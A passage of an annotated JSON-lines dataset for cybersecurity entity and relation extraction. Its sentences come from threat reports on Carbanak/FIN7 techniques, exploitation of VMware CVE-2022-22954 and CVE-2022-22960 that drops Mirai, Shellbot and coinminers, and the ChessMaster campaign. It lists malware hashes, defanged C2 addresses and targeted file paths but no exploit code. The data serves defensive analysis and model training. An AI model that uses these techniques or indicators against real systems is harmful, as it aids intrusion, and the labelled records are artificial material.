remain stealthy and undetected by using security solutions that can remove threats out of the system.","entities":[],"relations":[],"Comments":[]} {"id":3695,"text":"For defense evasion, both groups create or acquire tools for code signing the malware, or deobfuscate or decode files or information by using malware functions or utilities in the system.","entities":[],"relations":[],"Comments":[]} {"id":3696,"text":"Both groups also employ masquerading to make features appear benign to security solutions, files or information obfuscation to make these files and information difficult to discover, software packing to conceal code, and process injection to evade process-based defense.","entities":[{"id":49487,"label":"attack-pattern","start_offset":24,"end_offset":36},{"id":49488,"label":"attack-pattern","start_offset":221,"end_offset":238},{"id":49490,"label":"attack-pattern","start_offset":183,"end_offset":199},{"id":49489,"label":"attack-pattern","start_offset":91,"end_offset":123}],"relations":[],"Comments":[]} {"id":3697,"text":"Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.","entities":[{"id":49494,"label":"attack-pattern","start_offset":120,"end_offset":138},{"id":49493,"label":"attack-pattern","start_offset":64,"end_offset":78},{"id":49491,"label":"attack-pattern","start_offset":38,"end_offset":62},{"id":49492,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[{"id":806,"from_id":49492,"to_id":49491,"type":"uses"},{"id":807,"from_id":49492,"to_id":49493,"type":"uses"},{"id":808,"from_id":49492,"to_id":49494,"type":"uses"}],"Comments":[]} {"id":3698,"text":"FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions.","entities":[{"id":49495,"label":"attack-pattern","start_offset":79,"end_offset":105},{"id":49496,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49497,"label":"tools","start_offset":14,"end_offset":24}],"relations":[{"id":809,"from_id":49496,"to_id":49497,"type":"uses"},{"id":810,"from_id":49496,"to_id":49495,"type":"uses"}],"Comments":[]} {"id":3699,"text":"The group also evades virtualization and sandboxes and injects malicious code into hollowed processes to dodge process-based defenses.","entities":[{"id":49498,"label":"attack-pattern","start_offset":15,"end_offset":50},{"id":49499,"label":"attack-pattern","start_offset":56,"end_offset":77}],"relations":[],"Comments":[]} {"id":3700,"text":"Credential Access","entities":[],"relations":[],"Comments":[]} {"id":3701,"text":"Some portions of the system are protected by credentials.","entities":[],"relations":[],"Comments":[]} {"id":3702,"text":"To steal these, both groups employed credential dumping and input capture.","entities":[{"id":11230,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":11232,"label":"attack-pattern","start_offset":60,"end_offset":73}],"relations":[],"Comments":[]} {"id":3703,"text":"The former involves credentials that are usually in the form of hash or clear text, while the latter involves API or web portals.","entities":[],"relations":[],"Comments":[]} {"id":3704,"text":"Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.","entities":[{"id":11236,"label":"attack-pattern","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} {"id":3705,"text":"On the other hand, FIN7 performs hooking.","entities":[{"id":11240,"label":"attack-pattern","start_offset":33,"end_offset":40},{"id":49500,"label":"threat-actor","start_offset":19,"end_offset":23}],"relations":[{"id":811,"from_id":49500,"to_id":11240,"type":"uses"}],"Comments":[]} {"id":3706,"text":"Discovery","entities":[],"relations":[],"Comments":[]} {"id":3707,"text":"For the discovery phase, the Carbanak and FIN7 campaigns gain more knowledge about the system by gathering listings of various information: open application windows, running processes, IP addresses and other network identifiers in remote systems, detailed hardware and system information, system network configuration and settings, and system owners and users.","entities":[{"id":49502,"label":"threat-actor","start_offset":42,"end_offset":46},{"id":49501,"label":"threat-actor","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} {"id":3708,"text":"Carbanak also collects information on accounts, files and directories, group permissions, and registries.","entities":[{"id":49503,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3709,"text":"FIN7 gathers information on network shares.","entities":[{"id":49504,"label":"threat-actor","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3710,"text":"The gathered information can aid in the next step: lateral movement.","entities":[{"id":49505,"label":"attack-pattern","start_offset":51,"end_offset":67}],"relations":[],"Comments":[]} {"id":3711,"text":"Lateral Movement","entities":[{"id":49506,"label":"attack-pattern","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":3712,"text":"The groups move through the network and identify key assets and data by logging in via RDP, copying files to upload adversary tools through remote file copy, and abusing Window admin shares.","entities":[{"id":49508,"label":"attack-pattern","start_offset":162,"end_offset":189},{"id":49507,"label":"attack-pattern","start_offset":140,"end_offset":156}],"relations":[],"Comments":[]} {"id":3713,"text":"In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method.","entities":[{"id":49509,"label":"attack-pattern","start_offset":152,"end_offset":165},{"id":49510,"label":"threat-actor","start_offset":3,"end_offset":11},{"id":49511,"label":"attack-pattern","start_offset":110,"end_offset":138}],"relations":[{"id":812,"from_id":49510,"to_id":49511,"type":"uses"},{"id":813,"from_id":49510,"to_id":49509,"type":"uses"}],"Comments":[]} {"id":3714,"text":"Collection","entities":[],"relations":[],"Comments":[]} {"id":3715,"text":"After moving through the network and identifying assets to target, the next step would be to gather key data.","entities":[],"relations":[],"Comments":[]} {"id":3716,"text":"At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).","entities":[{"id":49515,"label":"attack-pattern","start_offset":53,"end_offset":91},{"id":49516,"label":"attack-pattern","start_offset":114,"end_offset":128},{"id":49512,"label":"threat-actor","start_offset":25,"end_offset":33},{"id":49513,"label":"threat-actor","start_offset":38,"end_offset":42},{"id":49514,"label":"malware","start_offset":175,"end_offset":189}],"relations":[{"id":814,"from_id":49512,"to_id":49513,"type":"related-to"},{"id":815,"from_id":49512,"to_id":49515,"type":"uses"},{"id":816,"from_id":49512,"to_id":49516,"type":"uses"}],"Comments":[]} {"id":3717,"text":"FIN7 attacks can stage collected data in a particular location in preparation for exfiltration.","entities":[{"id":49517,"label":"threat-actor","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3718,"text":"Command and Control","entities":[],"relations":[],"Comments":[]} {"id":3719,"text":"In both Carbanak and FIN7 attacks, communication with users’ compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group’s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","entities":[{"id":49518,"label":"threat-actor","start_offset":8,"end_offset":16},{"id":49519,"label":"threat-actor","start_offset":21,"end_offset":25},{"id":49520,"label":"attack-pattern","start_offset":97,"end_offset":116},{"id":49521,"label":"attack-pattern","start_offset":171,"end_offset":195},{"id":49522,"label":"attack-pattern","start_offset":352,"end_offset":393}],"relations":[{"id":817,"from_id":49518,"to_id":49519,"type":"related-to"},{"id":818,"from_id":49519,"to_id":49520,"type":"uses"},{"id":819,"from_id":49519,"to_id":49521,"type":"uses"},{"id":820,"from_id":49519,"to_id":49522,"type":"uses"}],"Comments":[]} {"id":3720,"text":"Carbanak campaigns can also use legitimate programs and remote access software for command and control.","entities":[{"id":49523,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3721,"text":"They also employ standard non-application layer protocols for communication.","entities":[],"relations":[],"Comments":[]} {"id":3722,"text":"Exfiltration","entities":[],"relations":[],"Comments":[]} {"id":3723,"text":"In the final phase of the attack, the groups exfiltrate the stolen data into the normal communications channel via command-and-control channels.","entities":[],"relations":[],"Comments":[]} {"id":3724,"text":"For FIN7 attack routines, data can be compressed and\/or encrypted before being exfiltrated.","entities":[{"id":49524,"label":"threat-actor","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":3725,"text":"ATT&CK® tactics and techniques for Linux were also shared by MITRE.","entities":[{"id":49525,"label":"identity","start_offset":61,"end_offset":66},{"id":49526,"label":"SOFTWARE","start_offset":35,"end_offset":40}],"relations":[],"Comments":[]} {"id":3726,"text":"Continuous vigilance against threat groups is an important aspect of keeping up with — if not being one step ahead of — threats.","entities":[],"relations":[],"Comments":[]} {"id":3727,"text":"Solutions such as Trend Micro Vision One™️ provide visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.","entities":[{"id":49527,"label":"SOFTWARE","start_offset":18,"end_offset":40}],"relations":[],"Comments":[]} {"id":3728,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":3729,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":3730,"text":"On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation.","entities":[{"id":49530,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":49531,"label":"vulnerability","start_offset":118,"end_offset":132},{"id":49533,"label":"SOFTWARE","start_offset":187,"end_offset":203},{"id":49534,"label":"SOFTWARE","start_offset":208,"end_offset":227},{"id":49532,"label":"SOFTWARE","start_offset":158,"end_offset":185},{"id":49528,"label":"TIME","start_offset":3,"end_offset":16},{"id":49529,"label":"identity","start_offset":18,"end_offset":24}],"relations":[{"id":821,"from_id":49532,"to_id":49530,"type":"has"},{"id":822,"from_id":49532,"to_id":49531,"type":"has"},{"id":823,"from_id":49533,"to_id":49530,"type":"has"},{"id":824,"from_id":49533,"to_id":49531,"type":"has"},{"id":825,"from_id":49534,"to_id":49530,"type":"has"},{"id":826,"from_id":49534,"to_id":49531,"type":"has"}],"Comments":[]} {"id":3731,"text":"On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.","entities":[{"id":49535,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":49536,"label":"TIME","start_offset":3,"end_offset":11}],"relations":[],"Comments":[]} {"id":3732,"text":" Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18.","entities":[{"id":49537,"label":"TIME","start_offset":117,"end_offset":135},{"id":49538,"label":"identity","start_offset":159,"end_offset":163},{"id":49539,"label":"TIME","start_offset":173,"end_offset":179}],"relations":[],"Comments":[]} {"id":3733,"text":"The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be exploited.","entities":[{"id":49540,"label":"identity","start_offset":4,"end_offset":8},{"id":49542,"label":"vulnerability","start_offset":49,"end_offset":63},{"id":49541,"label":"vulnerability","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} {"id":3734,"text":" Unit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild.","entities":[{"id":11330,"label":"identity","start_offset":1,"end_offset":8},{"id":49543,"label":"vulnerability","start_offset":44,"end_offset":58}],"relations":[],"Comments":[]} {"id":3735,"text":"In this blog post, we share context around this observed activity, along with how the Palo Alto Networks product suite can be leveraged to protect against it.","entities":[{"id":49544,"label":"identity","start_offset":86,"end_offset":104}],"relations":[],"Comments":[]} {"id":3736,"text":"Timeline for VMware Vulnerabilities CVE-2022-22954 in the Wild Direct Downloads Mirai\/Gafgyt Dropper Scripts or Variants Webshells Perl Shellbot Base64 Injections SSH Key Targeting CVE-2022-22960 in the Wild Conclusion Indicators of Compromise","entities":[{"id":49545,"label":"vulnerability","start_offset":13,"end_offset":50},{"id":49546,"label":"malware","start_offset":80,"end_offset":85},{"id":49547,"label":"malware","start_offset":86,"end_offset":100},{"id":49548,"label":"vulnerability","start_offset":181,"end_offset":195}],"relations":[{"id":827,"from_id":49546,"to_id":49547,"type":"related-to"},{"id":828,"from_id":49546,"to_id":49545,"type":"exploits"},{"id":829,"from_id":49546,"to_id":49548,"type":"exploits"}],"Comments":[]} {"id":3737,"text":" 2022-04-06:","entities":[{"id":49549,"label":"TIME","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} {"id":3738,"text":"Publication of VMware advisory VMSA-2022-0011 regarding CVE-2022-22954, CVE-2022-22955,CVE-2022-22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961.","entities":[{"id":49550,"label":"identity","start_offset":15,"end_offset":21},{"id":49551,"label":"vulnerability","start_offset":56,"end_offset":70},{"id":49552,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49553,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49554,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":49555,"label":"vulnerability","start_offset":119,"end_offset":133},{"id":49556,"label":"vulnerability","start_offset":135,"end_offset":149},{"id":49557,"label":"vulnerability","start_offset":151,"end_offset":165},{"id":49558,"label":"vulnerability","start_offset":167,"end_offset":181}],"relations":[],"Comments":[]} {"id":3739,"text":"2022-04","entities":[{"id":49559,"label":"TIME","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":3740,"text":"-11:","entities":[],"relations":[],"Comments":[]} {"id":3741,"text":"Proofs of concept available on GitHub.","entities":[{"id":49560,"label":"SOFTWARE","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} {"id":3742,"text":"This is also the earliest date at which Unit 42 observed exploitation attempts and scanning activity. 2022-04-13: VMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.","entities":[{"id":49562,"label":"TIME","start_offset":103,"end_offset":113},{"id":49563,"label":"identity","start_offset":115,"end_offset":121},{"id":49561,"label":"identity","start_offset":40,"end_offset":47},{"id":49564,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":3743,"text":"2022-05-18:","entities":[{"id":49565,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3744,"text":"Publication of VMware advisory VMSA-2022-0014 regarding CVE-2022-22972, CVE-2022-22973.","entities":[{"id":49568,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49566,"label":"identity","start_offset":15,"end_offset":21},{"id":49567,"label":"vulnerability","start_offset":56,"end_offset":70}],"relations":[],"Comments":[]} {"id":3745,"text":"Publication of CISA Alert.","entities":[{"id":49569,"label":"identity","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} {"id":3746,"text":" As of this writing, no proofs of concept for exploitation of CVE-22972 or CVE-2022-22973 are known.","entities":[{"id":49571,"label":"vulnerability","start_offset":75,"end_offset":89},{"id":49570,"label":"vulnerability","start_offset":62,"end_offset":71}],"relations":[],"Comments":[]} {"id":3747,"text":"This post will be updated with new findings as they are discovered.","entities":[],"relations":[],"Comments":[]} {"id":3748,"text":" CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.","entities":[{"id":49573,"label":"attack-pattern","start_offset":19,"end_offset":46},{"id":49574,"label":"attack-pattern","start_offset":68,"end_offset":98},{"id":49572,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":49575,"label":"SOFTWARE","start_offset":102,"end_offset":150}],"relations":[{"id":830,"from_id":49575,"to_id":49572,"type":"has"},{"id":831,"from_id":49572,"to_id":49573,"type":"uses"},{"id":832,"from_id":49572,"to_id":49574,"type":"uses"}],"Comments":[]} {"id":3749,"text":" The list below details the exploits Unit 42 observed targeting this vulnerability that we deemed worth highlighting.","entities":[{"id":49576,"label":"identity","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} {"id":3750,"text":"The injected commands worth mentioning that intended to further download payloads to a vulnerable machine can be categorized into the following broad categories: We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware.","entities":[{"id":49577,"label":"vulnerability","start_offset":196,"end_offset":210},{"id":49578,"label":"malware","start_offset":251,"end_offset":264}],"relations":[{"id":833,"from_id":49578,"to_id":49577,"type":"exploits"}],"Comments":[]} {"id":3751,"text":"In most cases, the exploit was only used to drop the payload, however the payloads themself did not contain CVE-2022-22954 exploits for further propagation.","entities":[{"id":49579,"label":"vulnerability","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} {"id":3752,"text":"Instead, they were either non-specific Mirai variants or contained previously known exploits such as CVE-2017-17215.","entities":[{"id":49581,"label":"malware","start_offset":39,"end_offset":44},{"id":49580,"label":"vulnerability","start_offset":101,"end_offset":115}],"relations":[{"id":834,"from_id":49581,"to_id":49580,"type":"exploits"}],"Comments":[]} {"id":3753,"text":" The exception to this is Enemybot, a currently prevalent botnet built with bits of code from both Gafgyt and Mirai source code.","entities":[{"id":49584,"label":"malware","start_offset":110,"end_offset":115},{"id":49582,"label":"malware","start_offset":26,"end_offset":34},{"id":49583,"label":"malware","start_offset":99,"end_offset":105}],"relations":[{"id":835,"from_id":49582,"to_id":49583,"type":"variant-of"},{"id":836,"from_id":49582,"to_id":49584,"type":"variant-of"}],"Comments":[]} {"id":3754,"text":"The exploits involving Enemybot eventually download Enemybot samples that themselves embed CVE-2022-22954 exploits for further exploitation and propagation.","entities":[{"id":11380,"label":"malware","start_offset":23,"end_offset":31},{"id":49586,"label":"vulnerability","start_offset":91,"end_offset":105},{"id":49585,"label":"malware","start_offset":52,"end_offset":60}],"relations":[{"id":837,"from_id":49585,"to_id":49586,"type":"exploits"},{"id":838,"from_id":11380,"to_id":49585,"type":"downloads"}],"Comments":[]} {"id":3755,"text":" We observed the vulnerability exploited to download webshells, including: Certain injected commands result in the download of obfuscated Perl scripts.","entities":[{"id":49588,"label":"attack-pattern","start_offset":128,"end_offset":151},{"id":49587,"label":"attack-pattern","start_offset":53,"end_offset":62}],"relations":[],"Comments":[]} {"id":3756,"text":"Deobfuscating these scripts reveals they are versions of the known bot family “Stealth Shellbot” that reaches out to an IRC server to listen for commands to perform.","entities":[{"id":49589,"label":"malware","start_offset":79,"end_offset":95}],"relations":[],"Comments":[]} {"id":3757,"text":"It has the ability to further make HTTP requests based on commands received.","entities":[],"relations":[],"Comments":[]} {"id":3758,"text":"This would mean infected machines could then be directed to further perform scanning and exploitation activity, in addition to directly executing shell commands received from the command and control (C2) server on the target machine.","entities":[],"relations":[],"Comments":[]} {"id":3759,"text":" A complete list of indicators of compromise (IoCs) can be found at the end of this post.","entities":[],"relations":[],"Comments":[]} {"id":3760,"text":" This last command downloads a shell script that ultimately downloads and executes an XMRig coinminer.","entities":[{"id":49590,"label":"malware","start_offset":86,"end_offset":101}],"relations":[],"Comments":[]} {"id":3761,"text":" We also observed some instances of injected payloads that were either trying to read authorized keys on vulnerable machines or were writing into the authorized_keys file to add to the machine’s list of accepted keys.","entities":[],"relations":[],"Comments":[]} {"id":3762,"text":"Following is an example of such an attempt.","entities":[],"relations":[],"Comments":[]} {"id":3763,"text":" CVE-2022-22960 is a privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation instances, due to improper permissions in support scripts.","entities":[{"id":49592,"label":"attack-pattern","start_offset":21,"end_offset":41},{"id":49593,"label":"SOFTWARE","start_offset":59,"end_offset":128},{"id":49591,"label":"vulnerability","start_offset":1,"end_offset":15}],"relations":[{"id":839,"from_id":49591,"to_id":49592,"type":"uses"},{"id":840,"from_id":49593,"to_id":49591,"type":"has"}],"Comments":[]} {"id":3764,"text":"The vulnerability can be leveraged to run commands as a root user on a vulnerable instance.","entities":[],"relations":[],"Comments":[]} {"id":3765,"text":" More specifically, this flaw exists since the default user for these VMware products, horizon, has access to several sudo commands, some of which involve paths that can be overwritten as well.","entities":[{"id":49594,"label":"identity","start_offset":70,"end_offset":76},{"id":49595,"label":"SOFTWARE","start_offset":87,"end_offset":94}],"relations":[],"Comments":[]} {"id":3766,"text":" Attackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths.","entities":[{"id":49598,"label":"attack-pattern","start_offset":83,"end_offset":107},{"id":49596,"label":"vulnerability","start_offset":36,"end_offset":50},{"id":49597,"label":"attack-pattern","start_offset":54,"end_offset":79}],"relations":[{"id":842,"from_id":49596,"to_id":49597,"type":"uses"},{"id":843,"from_id":49596,"to_id":49598,"type":"uses"}],"Comments":[]} {"id":3767,"text":"If successful, CVE-2022-22960 can then be leveraged to execute these overwritten paths with root permissions using the sudo command.","entities":[{"id":49599,"label":"vulnerability","start_offset":15,"end_offset":29}],"relations":[],"Comments":[]} {"id":3768,"text":" Our research so far has shown one publicly known sample demonstrating exploitation of CVE-2022-22960 by overwriting the \/usr\/local\/horizon\/scripts\/publishCaCert.hzn file.","entities":[{"id":49600,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49601,"label":"FILEPATH","start_offset":121,"end_offset":165}],"relations":[{"id":841,"from_id":49601,"to_id":49600,"type":"related-to"}],"Comments":[]} {"id":3769,"text":" The content of this exploit file can be observed below.","entities":[],"relations":[],"Comments":[]} {"id":3770,"text":" Another proof of concept code sample is additionally available targeting the following 2 filepaths: \/opt\/vmware\/certproxy\/bin\/certproxyService.sh \/usr\/local\/horizon\/scripts\/diagnostic\/getPasswordExpiry.hzn ","entities":[{"id":49603,"label":"FILEPATH","start_offset":148,"end_offset":207},{"id":49602,"label":"FILEPATH","start_offset":102,"end_offset":147}],"relations":[],"Comments":[]} {"id":3771,"text":"Palo Alto Networks is still actively investigating a number of the aforementioned vulnerabilities, many of which do not have publicly available exploit code.","entities":[{"id":49604,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":3772,"text":"Presently, customers may leverage the following to block or detect the threats communicated throughout this publication:","entities":[],"relations":[],"Comments":[]} {"id":3773,"text":"Palo Alto Networks Next Generation Firewall Threat Prevention blocks CVE-2022-22954 exploits with Signature 92483.","entities":[{"id":49605,"label":"SOFTWARE","start_offset":0,"end_offset":61},{"id":49606,"label":"vulnerability","start_offset":69,"end_offset":83}],"relations":[],"Comments":[]} {"id":3774,"text":" Cortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public internet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.","entities":[{"id":49607,"label":"SOFTWARE","start_offset":1,"end_offset":14},{"id":49608,"label":"SOFTWARE","start_offset":54,"end_offset":81}],"relations":[],"Comments":[]} {"id":3775,"text":" WildFire and Cortex XDR categorize all samples of supported file types as malware.","entities":[{"id":49609,"label":"SOFTWARE","start_offset":1,"end_offset":9},{"id":49610,"label":"SOFTWARE","start_offset":14,"end_offset":24}],"relations":[],"Comments":[]} {"id":3776,"text":" Additionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering URL database.","entities":[],"relations":[],"Comments":[]} {"id":3777,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: As further information or detections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":49611,"label":"identity","start_offset":92,"end_offset":122},{"id":49612,"label":"identity","start_offset":190,"end_offset":208}],"relations":[],"Comments":[]} {"id":3778,"text":" Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":49616,"label":"identity","start_offset":116,"end_offset":145},{"id":49613,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":3779,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":49615,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3780,"text":"Learn more about the Cyber Threat Alliance.","entities":[{"id":49617,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} {"id":3781,"text":" Mirai\/Gafgyt dropper scripts or variants Perl Shellbot Coinminer activity Webshell downloads (full injected command) Callback\/Scanning activity Direct Download exploits where payloads were no longer live at the time of analysis: Sample hashes 801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637 6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b 940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8 fdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05 85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03 bot.v 0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba C2 server : 5[.]39.217.212:80","entities":[{"id":11449,"label":"malware","start_offset":58,"end_offset":67},{"id":11452,"label":"SHA2","start_offset":251,"end_offset":315},{"id":11453,"label":"SHA2","start_offset":316,"end_offset":380},{"id":11454,"label":"SHA2","start_offset":381,"end_offset":445},{"id":11455,"label":"SHA2","start_offset":446,"end_offset":510},{"id":11456,"label":"SHA2","start_offset":511,"end_offset":575},{"id":11457,"label":"SHA2","start_offset":583,"end_offset":647},{"id":49619,"label":"IPV4","start_offset":660,"end_offset":677},{"id":49620,"label":"malware","start_offset":1,"end_offset":21}],"relations":[{"id":845,"from_id":11453,"to_id":49620,"type":"indicates"},{"id":844,"from_id":11452,"to_id":49620,"type":"indicates"},{"id":846,"from_id":11454,"to_id":49620,"type":"indicates"},{"id":847,"from_id":11455,"to_id":49620,"type":"indicates"},{"id":848,"from_id":11456,"to_id":49620,"type":"indicates"},{"id":849,"from_id":11457,"to_id":49620,"type":"indicates"},{"id":850,"from_id":49620,"to_id":49619,"type":"communicates-with"}],"Comments":[]} {"id":3782,"text":"Channel : #vcenter getsome bot.redis 48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b C2 server : 64[.]32.6.143:80","entities":[{"id":11458,"label":"SHA2","start_offset":38,"end_offset":102},{"id":49621,"label":"IPV4","start_offset":115,"end_offset":131}],"relations":[],"Comments":[]} {"id":3783,"text":"Channel : #redis getsome botVNC c399b56e1baf063ca2c8aadbbe4a2b58141916aac8ef790a9c29762ed1956bd5 C2 server : 5[.]39.217.212:80","entities":[{"id":11459,"label":"SHA2","start_offset":33,"end_offset":97},{"id":49622,"label":"IPV4","start_offset":110,"end_offset":127}],"relations":[],"Comments":[]} {"id":3784,"text":"Channel : #D getsome 7e29615126585b9f87ded09cfae4724bb5d7896c7daf2adfcef775924549e49b 099ac2f3e10346dbef472b2a7b443ebfe1f6011a9a2518a54c20aad07fe9ec61 Updated May 23, 2022, at 1 p.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[{"id":11461,"label":"SHA2","start_offset":88,"end_offset":152},{"id":11460,"label":"SHA2","start_offset":22,"end_offset":86},{"id":49623,"label":"TIME","start_offset":162,"end_offset":189}],"relations":[],"Comments":[]} {"id":3785,"text":"Additional resources https:\/\/www.zerodayinitiative.com\/about https:\/\/www.zerodayinitiative.com\/blog Tags","entities":[{"id":11467,"label":"URL","start_offset":21,"end_offset":60},{"id":49624,"label":"URL","start_offset":61,"end_offset":99}],"relations":[],"Comments":[]} {"id":3786,"text":" Latest News | Exploits & Vulnerabilities | Cyber Threats | Connected Car | APT & Targeted Attacks | Endpoints | IoT | Video","entities":[],"relations":[],"Comments":[]} {"id":3787,"text":"Trend Micro discovered the ChessMaster campaign back in July 2017 as part of our monitoring efforts to protect our customers.","entities":[{"id":49626,"label":"identity","start_offset":0,"end_offset":11},{"id":49627,"label":"campaign","start_offset":27,"end_offset":47},{"id":49625,"label":"TIME","start_offset":56,"end_offset":65}],"relations":[],"Comments":[]} {"id":3788,"text":"At the time, we found ChessMaster targeting different sectors from the academe to media and government agencies in Japan.","entities":[{"id":49628,"label":"campaign","start_offset":22,"end_offset":33},{"id":49629,"label":"identity","start_offset":71,"end_offset":111},{"id":49630,"label":"location","start_offset":115,"end_offset":120}],"relations":[{"id":851,"from_id":49628,"to_id":49629,"type":"targets"},{"id":852,"from_id":49629,"to_id":49630,"type":"located-at"}],"Comments":[]} {"id":3789,"text":"The threat group used a variety of attack tools and techniques to spy on their target organizations.","entities":[],"relations":[],"Comments":[]} {"id":3790,"text":" Back then, we noted that ChessMaster's sophisticated nature implied that the campaign could evolve, before finding changes in the tools and tactics used in the campaign a few months later.","entities":[{"id":49631,"label":"campaign","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} {"id":3791,"text":" While the original campaign was comprehensive and used remote access Trojans (RATs) such as ChChes and RedLeaves, this new campaign used a new backdoor (Detected by Trend Micro as BKDR_ANEL.ZKEI) that leverages the CVE-2017-8759 vulnerability for its cyberespionage activities.","entities":[{"id":49632,"label":"malware","start_offset":93,"end_offset":99},{"id":49633,"label":"malware","start_offset":104,"end_offset":113},{"id":49634,"label":"malware","start_offset":181,"end_offset":195},{"id":49636,"label":"identity","start_offset":166,"end_offset":177},{"id":49635,"label":"vulnerability","start_offset":216,"end_offset":229}],"relations":[{"id":853,"from_id":49634,"to_id":49635,"type":"exploits"}],"Comments":[]} {"id":3792,"text":"In this blog post, we analyze ChessMaster's current status, including the updated tools in its arsenal — with a particular focus on the evolution of ANEL and how it is used in the campaign.","entities":[{"id":49638,"label":"malware","start_offset":149,"end_offset":153},{"id":49637,"label":"campaign","start_offset":30,"end_offset":41}],"relations":[],"Comments":[]} {"id":3793,"text":" July ChessMaster Campaign November ChessMaster Campaign Current ChessMaster Campaign","entities":[{"id":49639,"label":"campaign","start_offset":8,"end_offset":19},{"id":49642,"label":"campaign","start_offset":38,"end_offset":49},{"id":49643,"label":"campaign","start_offset":67,"end_offset":78},{"id":49640,"label":"TIME","start_offset":3,"end_offset":7},{"id":49641,"label":"TIME","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} {"id":3794,"text":" Point of Entry Spear-phishing emails containing decoy documents Malicious shortcut (LNK) files and PowerShell Self-extracting archive (SFX) Runtime packers Spear-phishing emails containing decoy documents exploiting CVE-2017-8759 Spear-phishing emails containing decoy documents exploiting CVE-2017-11882, DDEAUTO, Microsoft Office Frameset and Link auto update Notable Tools Hacking Tools Second-stage payloads Koadic Hacking Tools Second-stage payloads Koadic Hacking Tools Second-stage payloads Backdoor ChChes ANEL ANEL Technical Analysis Figure 